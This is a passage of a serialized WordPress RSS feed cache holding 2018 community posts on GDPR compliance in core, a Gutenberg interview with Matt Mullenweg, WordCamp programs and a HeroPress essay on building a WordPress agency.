href=\"https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fheropress.com%2Fchanges-coming-heropress%2F&title=Changes+Coming+To+HeroPress\" rel=\"nofollow\" target=\"_blank\" title=\"Share: Changes Coming To HeroPress\"></a></div></div><div class=\"rtsocial-pinterest-horizontal\"><div class=\"rtsocial-pinterest-horizontal-button\"><a class=\"rtsocial-pinterest-button\" href=\"https://pinterest.com/pin/create/button/?url=https://heropress.com/changes-coming-heropress/&media=https://heropress.com/wp-content/plugins/rtsocial/images/default-pinterest.png&description=Changes Coming To HeroPress\" rel=\"nofollow\" target=\"_blank\" title=\"Pin: Changes Coming To HeroPress\"></a></div></div><a rel=\"nofollow\" class=\"perma-link\" href=\"https://heropress.com/changes-coming-heropress/\" title=\"Changes Coming To HeroPress\"></a></div><p>The post <a rel=\"nofollow\" href=\"https://heropress.com/changes-coming-heropress/\">Changes Coming To HeroPress</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Feb 2018 12:00:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: New Team Forms to Facilitate GDPR Compliance in WordPress Core\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78149\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"https://wptavern.com/new-team-forms-to-facilitate-gdpr-compliance-in-wordpress-core\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:6200:\"<p>As May 25th, the enforcement date for the <a href=\"https://www.eugdpr.org/\">General Data Protection Regulation</a> (GDPR) draws near, individuals and businesses are scrambling to make sure they&#8217;re compliant. I&#8217;ve read a number of blog posts throughout the WordPress community explaining the GDPR and what needs to be done for compliance and it&#8217;s a tough thing to grasp.</p>\n<p>The EU GDPR was designed to harmonize data privacy laws across Europe, protect and empower European citizens data privacy, and reshape the way organizations across the region approach data privacy. In reading the regulation and various blog posts, the terminology makes it appear that the changes are geared towards large, international businesses that process personal data.</p>\n<p>However, <a href=\"https://www.smashingmagazine.com/2018/02/gdpr-for-web-developers/\">according to Heather Burns</a>, a digital law specialist in Glasgow, Scotland, the GDPR affects sites large and small.</p>\n<blockquote><p>GDPR applies to all businesses, organizations, sectors, situations, and scenarios, regardless of a business’s size, head count, or financial turnover. A small app studio is every bit as beholden to these rules as a large corporation.</p></blockquote>\n<p>Determining if your site needs to be compliant and how to accomplish it can be overwhelming. If you do business in Europe or collect data from European users, you must protect that data in accordance with the GDPR as if you were in Europe. For example, if you operate a blog with a contact form that saves entries to the database from people who live in Europe, you must make your site GDPR compliant.</p>\n<p>There are a lot of aspects to the GDPR and while an excerpt can not fully explain it at a glance, there are a few themes that stick out to me.</p>\n<ul>\n<li>Be upfront and concise about what data is stored, sent, and used on the site or form.</li>\n<li>Give the user a chance to consent without automatically opting them in.</li>\n<li>Collect the least amount of data possible for legitimate business purposes.</li>\n<li>Provide a way for users to download or access their data and remove it.</li>\n</ul>\n<p>Many of these are common sense practices that are not implemented on many sites, WP Tavern included. How often do you visit a <a href=\"https://wptavern.com/contact-me\">site&#8217;s contact form</a> and see an explanation as to why those fields are required, where the data is stored, where it goes, and what is done with it? This is something I&#8217;ll be working on in the next few weeks.</p>\n<h2>Making WordPress Core GDPR Compliant</h2>\n<p>Earlier <a href=\"https://make.wordpress.org/core/2018/02/13/gdpr-compliance-agenda-february-14/\">this month</a>, a number of volunteers gathered to discuss GDPR compliance in WordPress core. The meeting took place in a newly created channel #gdpr-compliance that&#8217;s accessible to anyone with a <a href=\"https://make.wordpress.org/chat/\">SlackHQ account</a>.</p>\n<p>The team created a <a href=\"https://make.wordpress.org/core/2018/02/19/proposed-roadmap-tools-for-gdpr-compliance/\">proposed roadmap</a> to add privacy tools to core. The plan includes the following ideas:</p>\n<ul>\n<li>Add notices for registered users and commenters on what data is collected in core by default and explain why.</li>\n<li>Create guidelines for plugins on how to become GDPR compliant.</li>\n<li>Create and add tools to facilitate compliance and privacy in general.</li>\n<li>Add documentation and help for site owners to learn how to use these tools.</li>\n</ul>\n<p><a href=\"https://wordpress.slack.com/archives/C9695RJBW/p1519227959000760\">Earlier today</a>, <a href=\"https://make.wordpress.org/core/2018/02/27/gdpr-compliance-chat-recap-february-21st/\">the team met</a> and created a <a href=\"https://github.com/gdpr-compliance/info\">GitHub folder</a> that houses the roadmap, knowledge base, trac ticket list, and other items associated with the project. There was also some discussion on whether the interface provided by the <a href=\"https://www.gdprwp.com/\">GDPR for WordPress project</a> is a good foundation for core and plugins to report personal data. The GDPR Compliance Slack channel is also a good place to ask questions and discuss data privacy in general.</p>\n<p>Popular form plugins such as <a href=\"https://docs.gravityforms.com/wordpress-gravity-forms-and-gdpr-compliance/\">GravityForms</a> and <a href=\"https://ninjaforms.com/gdpr-compliance-wordpress-forms/\">NinjaForms</a> have documentation available that explains GDPR compliance and how it applies to their products. For those who use the Contact Form module in Jetpack which <a href=\"https://github.com/Automattic/jetpack/issues/8430\">saves entries to the database by default</a>, you&#8217;ll need to wait for further updates. <a href=\"https://woocommerce.com/2017/12/gdpr-compliance-woocommerce/\">WooCommerce</a> and <a href=\"https://en.support.wordpress.com/automattic-gdpr/\">Automattic</a> have announced that they expect their products will be GDPR compliant by the time it goes into effect later this year.</p>\n<h2>GDPR Resources</h2>\n<p>If you&#8217;re like me, reading about the GDPR and its policies can make your head spin. It&#8217;s important to keep in mind that at the heart of the GDPR are common sense behaviors for handling personal data. If you&#8217;d like to learn more about the GDPR, check out the following resources.</p>\n<ul>\n<li><a href=\"https://www.smashingmagazine.com/2018/02/gdpr-for-web-developers/\">How GDPR Will Change The Way You Develop</a></li>\n<li><a href=\"https://wordpress.tv/2016/11/01/heather-burns-get-to-grips-with-gdpr/\">Heather Burns: Get To Grips With GDPR</a></li>\n<li><a href=\"https://webdevlaw.uk/data-protection-gdpr/\">Data protection (GDPR)</a></li>\n<li><a href=\"https://wptavern.com/wpweekly-episode-298-gdpr-user-privacy-and-more-with-heather-burns\">WPWeekly Episode 298 – GDPR, User Privacy, and More With Heather Burns</a></li>\n<li><a href=\"https://www.eugdpr.org/gdpr-faqs.html\">GDPR FAQs</a></li>\n<li><a href=\"https://premium.wpmudev.org/blog/gdpr-compliance/\">Is Your Website GDPR Compliant? How to Get Ready for the General Data Protection Regulations</a></li>\n</ul>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 27 Feb 2018 23:20:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"WPTavern: Matt Cromwell Hosts Matt Mullenweg in Q&amp;A Gutenberg Interview\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78166\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://wptavern.com/matt-cromwell-hosts-matt-mullenweg-in-qa-gutenberg-interview\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2903:\"<p>Matt Cromwell, Head of Support and Community Outreach for <a href=\"https://givewp.com/\">GiveWP</a> and an administrator for the <a href=\"https://www.facebook.com/groups/advancedwp/\">Advanced WordPress Facebook group</a>, hosted a question and answer session about Gutenberg with Matt Mullenweg earlier today. The interview concludes the <a href=\"http://www.advancedwp.org/awp-gutenberg-interview-series/\">Advanced WordPress Gutenberg interview series</a> that includes, <a href=\"https://wordpress.tv/2018/02/06/awp-gutenberg-interview-series-with-joost-de-valk/\">Joost de Valk</a>, <a href=\"https://wordpress.tv/2018/02/18/awp-gutenberg-interview-series-with-ahmad-awais/\">Ahmad Awais</a>, and <a href=\"https://youtu.be/ic_du_lsbLE\">Tammie Lister</a>.</p>\n<p>Mullenweg began the session by explaining why there is a concerted effort to improve the editor. &#8220;It&#8217;s really almost any user test that you watch,&#8221; he said. &#8220;Both watching people brand new to WordPress and those with years of experience on how they used the editor. It became obvious that we could make something more accessible to new users, but also, a lot more powerful for developers.&#8221;</p>\n<p>With regards to a release date, Mullenweg confirmed that Gutenberg will ship when it&#8217;s ready. Later in the interview, Mullenweg was asked if he could provide a more concrete answer.</p>\n<p>&#8220;For those who want a concrete date, we will have one or two orders of magnitude more users of Gutenberg in April,&#8221; he responded. &#8220;That doesn&#8217;t mean necessarily a 5.0 release, but it does mean that if you&#8217;re planning on aiming for something where a lot of users will be interacting with Gutenberg, aim for April.&#8221;</p>\n<p>While the project&#8217;s name is Gutenberg, some developers have <a href=\"https://github.com/WordPress/gutenberg/issues/4681\">expressed concerns</a> on how the name will be deprecated if at all once it&#8217;s merged into core. There are a number of educational resources, products, and tool kits referencing Gutenberg that could be a source of confusion once it&#8217;s merged into core and referred to as the editor.</p>\n<p>Mullenweg was asked if the Gutenberg name will be deprecated. &#8220;We&#8217;ll see,&#8221; he replied. &#8220;I don&#8217;t think it&#8217;s the most important thing to figure out right now. We&#8217;re tackling some much bigger issues. If the plugin is useful, we&#8217;ll keep it around for beta testing, if not, we&#8217;ll have it turn itself off.&#8221;</p>\n<p>Mullenweg concluded the interview thanking the <a href=\"https://www.facebook.com/groups/advancedwp/\">Advanced WordPress Facebook</a> group for the passion and discussions shared by members. The group has more than 30K members, is free to join, well maintained, and often filled with interesting topics. You can watch the interview in its entirety below.</p>\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 26 Feb 2018 23:32:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"Post Status: Observations on a maturing ecosystem — Draft podcast\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=43914\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://poststatus.com/observations-maturing-ecosystem-draft-podcast/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1743:\"<p>Welcome to the Post Status <a href=\"https://poststatus.com/category/draft\">Draft podcast</a>, which you can find <a href=\"https://itunes.apple.com/us/podcast/post-status-draft-wordpress/id976403008\">on iTunes</a>, <a href=\"https://play.google.com/music/m/Ih5egfxskgcec4qadr3f4zfpzzm?t=Post_Status__Draft_WordPress_Podcast\">Google Play</a>, <a href=\"http://www.stitcher.com/podcast/krogsgard/post-status-draft-wordpress-podcast\">Stitcher</a>, and <a href=\"http://simplecast.fm/podcasts/1061/rss\">via RSS</a> for your favorite podcatcher. Post Status Draft is hosted by Brian Krogsgard and co-host Brian Richards.</p>\n<p>In this episode, the Brians chat about the steady change that has played out in the WordPress ecosystem throughout the past decade and speculate about what is still to come. One aspect they explore rather deeply is the future trajectory of a website’s purpose and the role WordPress has to play in this transition. Plus, don’t miss their conversation about the new WordPress.com president and Google’s move to hire WordPress talent.</p>\n<p></p>\n<h3>Links</h3>\n<ul>\n<li><a href=\"https://memos.blog/2018/02/15/kinsey-wilson-named-president-of-wordpress-com/\">New WordPress.com President announcement</a></li>\n<li><a href=\"https://medinathoughts.com/2018/01/29/wordpress-google/\">Google&#8217;s WordPress job opportunity</a></li>\n<li><a href=\"https://micro.blog/\">micro.blog</a></li>\n</ul>\n<h3>Sponsor: SearchWP</h3>\n<p>SearchWP makes WordPress search better. Instantly improve your site search without writing a line of code! SearchWP enables custom algorithms, searching custom fields, product data, and much more. Improve your site’s search today with our partner, <a href=\"https://searchwp.com\">SearchWP</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 25 Feb 2018 12:59:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Katie Richards\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:10;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: WordCamp Orange County Plugin-A-Palooza First Place Prize is $3,000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://wptavern.com/?p=78153\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"https://wptavern.com/wordcamp-orange-county-plugin-a-palooza-first-place-prize-is-3000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2009:\"<p><a href=\"https://2018.oc.wordcamp.org/\">WordCamp Orange County</a>, CA, 2018 will take place June 9-10. In addition to the regular WordCamp format of speakers sharing their knowledge, there is also a mini-event called Plugin-A-Palooza. This year marks the fourth contest where plugin authors will compete for one of three prizes.</p>\n<ul>\n<li>First Place – <strong>$3,000</strong> cash and 1 Sucuri Business (VIP) license</li>\n<li>Second Place – <strong>$1,500</strong> cash and 1 Sucuri Business (VIP) license</li>\n<li>Third Place – <strong>$500</strong> cash</li>\n</ul>\n<p>Teams will be judged live based on the following criteria:</p>\n<ul>\n<li>Originality</li>\n<li>User Experience/User Interface</li>\n<li>Code Quality</li>\n<li>Presentation of the plugin on WordPress.org.</li>\n</ul>\n<p>Teams can have up to three participants, are required to build their own plugin, and upload it to the WordPress plugin directory by May 18th. Teams will present their plugins to the judges and audience on June 10th.</p>\n<p>Previous winners and plugins include:</p>\n<ul>\n<li>2015 Devin Walker- <a href=\"https://wordpress.org/plugins/wp-rollback/\">WP Rollback</a></li>\n<li>2016 Robert Gillmer &#8211; <a href=\"https://wordpress.org/plugins/wp-documentor/\">WP Documentor</a></li>\n<li>2017 Natalie MacLees &#8211; <a href=\"https://wordpress.org/plugins/simple-event-listing/\">Simple Event Listing</a></li>\n</ul>\n<p>Bridget Willard, WordCamp Orange County organizer, says the event encourages innovation and personal development which are important parts of WordCamps. &#8220;The first plugin that won was WPRollback by WordImpress,&#8221; she said. &#8220;It&#8217;s widely used in the community now. We&#8217;d love to see other camps doing this.&#8221;</p>\n<p>If you&#8217;re interested in participating in Plugin-A-Palooza at WordCamp Orange County this year, you&#8217;ll need to fill out this <a href=\"https://goo.gl/forms/CpDCsXQRqNI0cil23\">entry form</a>. The deadline for submissions is March 5th.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 23 Feb 2018 22:46:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:11;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"Dev Blog: WordCamp Incubator 2.0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=5577\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/news/2018/02/wordcamp-incubator-2-0/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2449:\"<p><a href=\"https://central.wordcamp.org/\">WordCamps</a> are informal, community-organized events that are put together by a team of local WordPress users who have a passion for growing their communities. They are born out of active WordPress meetup groups that meet regularly and are able to host an annual WordCamp event. This has worked very well in many communities, with over 120 WordCamps being hosted around the world in 2017.<br /></p>\n\n<p>Sometimes though, passionate and enthusiastic community members can’t pull together enough people in their community to make a WordCamp happen. To address this, we introduced <a href=\"https://wordpress.org/news/2016/02/experiment-wordcamp-incubator/\">the WordCamp Incubator program</a> in 2016.<br /></p>\n\n<p>The goal of the incubator program is <strong>to help spread WordPress to underserved areas by providing more significant organizing support for their first WordCamp event.</strong> In 2016, members of <a href=\"https://make.wordpress.org/community/\">the global community team</a> worked with volunteers in three cities — Denpasar, Harare and Medellín — giving direct, hands-on assistance in making local WordCamps possible. All three of these WordCamp incubators <a href=\"https://make.wordpress.org/community/2017/06/30/wordcamp-incubator-report/\">were a great success</a>, so we&#x27;re bringing the incubator program back for 2018.<br /></p>\n\n<p>Where should the next WordCamp incubators be? If you have always wanted a WordCamp in your city but haven’t been able to get a community started, this is a great opportunity. We will be taking applications for the next few weeks, then will get in touch with everyone who applied to discuss the possibilities. We will announce the chosen cities by the end of March.<br /></p>\n\n<p><strong>To apply, </strong><a href=\"https://wordcampcentral.polldaddy.com/s/wordcamp-incubator-program-2018-city-application\"><strong>fill in the application</strong></a><strong> by March 15, 2018.</strong> You don’t need to have any specific information handy, it’s just a form to let us know you’re interested. You can apply to nominate your city even if you don’t want to be the main organizer, but for this to work well we will need local liaisons and volunteers, so please only nominate cities where you live or work so that we have at least one local connection to begin.<br /></p>\n\n<p>We&#x27;re looking forward to hearing from you!<br /></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 21 Feb 2018 22:53:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Hugh Lashbrooke\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:12;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"HeroPress: How To Build A Company With WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=2465\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:120:\"https://heropress.com/essays/build-company-wordpress/#utm_source=rss&utm_medium=rss&utm_campaign=build-company-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:16946:\"<img width=\"960\" height=\"480\" src=\"https://heropress.com/wp-content/uploads/2018/02/022118-1024x512.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: If you keep showing up, you\'d be surprised what happens.\" />.embed-container { position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden; max-width: 100%; } .embed-container iframe, .embed-container object, .embed-container embed { position: absolute; top: 0; left: 0; width: 100%; height: 100%; }\n<div class=\"embed-container\"></div>\n<p>&nbsp;</p>\n<h4>Full text of the above video</h4>\n<p>Hey, y&#8217;all! Thanks for inviting me to come share my story on HeroPress. I&#8217;m so excited to be able to talk a little bit to the HeroPress community.</p>\n<p>So, and I&#8217;m doing a video blog or vlog because this is what I do; I&#8217;m a YouTube person. I create YouTube videos every single Wednesday for what I call WordPress Wednesday to help you improve your online marketing inside of the WordPress world. So I&#8217;m used to doing videos, and I asked if I could do my HeroPress story in this format; and they said go for it, so I&#8217;m excited to talk to you at least in a face-to-face scenario.</p>\n<p>I&#8217;m going to  share a little bit of my story and tell you how WordPress basically became my avenue for becoming a millionaire in just five short years.</p>\n<h3>The Beginning</h3>\n<p>So in 1998, I created my very first ever HTML website. My dad was actually doing websites at the time, and I needed a website for my band because that&#8217;s what I wanted to be is a rockstar; so I learned how to build a website, kind of, under his training and a little bit of self-taught stuff and had a lot of fun doing it that way in 1998.</p>\n<p>And then in 2005, I started hearing about WordPress; but in 2008, as I was freelancing around, a client asked me to build him a website. And they said, &#8220;hey, Kori, can you, can you build me a website, but we absolutely have to have it on WordPress?&#8221; I was like, sure, no problem; straight to Google, &#8220;how do you build a WordPress website&#8221;, you know. And over the weekend I pretty much taught myself how to build out a WordPress website, and I loved it.</p>\n<p>My mind was absolutely blown when I saw the drag and drop options inside of menus to create dropdowns, and a form builder; I was just blown away. So those of you who have struggled in the HTML CSS world, you know the magic or the majesty, if you will even, of WordPress and those environments and how easy it makes it. So when I saw that, I really just thought, oh my goodness, this is a full-circle moment for me.</p>\n<blockquote><p>I really want to use WordPress now from here on forward.</p></blockquote>\n<p>So I reached back out to my dad and said, &#8220;hey, dad, you know, this is a tool that our customers, all of our clients, have been asking us for&#8221;. They&#8217;ve been wanting access to their websites, and we&#8217;ve not been able to give it to them because, in the past, they had to download Dreamweaver, you know, Photoshop and an FTP program; and that was just too much nerd code for them. So we wanted to be able to give them something like this, and WordPress definitely was that solution.</p>\n<p>So he and I worked back and forth for a few years learning, really truly learning, WordPress; and then in 2012, we decided to launch together, my mom, my dad and I, decided to launch WebTegrity in San Antonio, Texas. And it was a very small concept initially; you know, we just me, literally, the three of us, and me and my folks. And then we hired on a subcontractor who is a great graphic designer here in town to try to help us with the creative side of things, and we started to grow our team.</p>\n<h3>Going Big Time</h3>\n<p>So how did we, in five years, build it up in such a way that we were able to sell it for a deal of a million dollars&#8217; worth of shares, which ultimately is a $20 million value deal? How did we do that? I&#8217;m going to give you a little bit of insight on how we were able to accomplish that in such a short time.</p>\n<p>So the very first thing I want you to realize is we did this in a saturated industry in San Antonio, Texas. When I did a search for web developer or web design firms back in 2012, I had over 700 results of different either freelancers or agencies or ad agencies or some solution out there that was either in the general area, or in the nearby area, that provided that service. So how did we, in six years, end up becoming number six in the entire city? We ranked in the top 10; how did we do that?</p>\n<blockquote><p>One of the very first things we did, was we niched ourselves; and, thankfully, WordPress was that solution.</p></blockquote>\n<p>In 2012, there was not an agency directly in San Antonio that was trying to be the go-to place for WordPress; and we purposely started stepping up and saying we are WordPress only, WordPress only, WordPress only. So if you were looking for a different type of CMS solution, we were not the right fit for you. And very, very quickly, we also started teaching it in the city; so we would teach other agencies. We provided on-site training; we provided weekend workshops. All for a price tag, of course; but that was one of our revenue streams. And, again, it set us as the authority in the city for WordPress; so really important that you understand how to niche yourselves and not try to be all things to all people.</p>\n<blockquote><p>The second thing we tried to do was really build a culture.</p></blockquote>\n<p>And you can see, I don&#8217;t work around boring walls. Everything that I do has to have creative juices flowing around me, right. We just want to create a great culture, a great environment. So we had to hire the right people. So that&#8217;s my next tip to you is be very, very careful on who you allow into your culture of your business, who you hire on, and certainly who you bring on as a leader in your culture in your community. So one of the things that we did right away was realize that we can&#8217;t teach passion, so you gotta find people that have a passion to nerd out on stuff like this.</p>\n<p>And you have to find people who have great integrity to just do their best at all times, and you have to find people who love to be creative and love to solve problems for clients, right, who aren&#8217;t just salespeople, right? So if you can find those things, you can teach nerd code all day long; so be sure to just find people with the right hearts to join your community and then train them up the right way, be sure that you just grow and grow and grow your culture in a healthy way, right.</p>\n<blockquote><p>And another thing that we did, so this is another tip, was understand how to really build a revenue stream that was going to be sustainable.</p></blockquote>\n<p>All right, so wrap your heads around this one because this one&#8217;s key. Very early on in our model as we were selling WordPress websites, part of my pitch was, oh, it&#8217;s just five grand and no more after 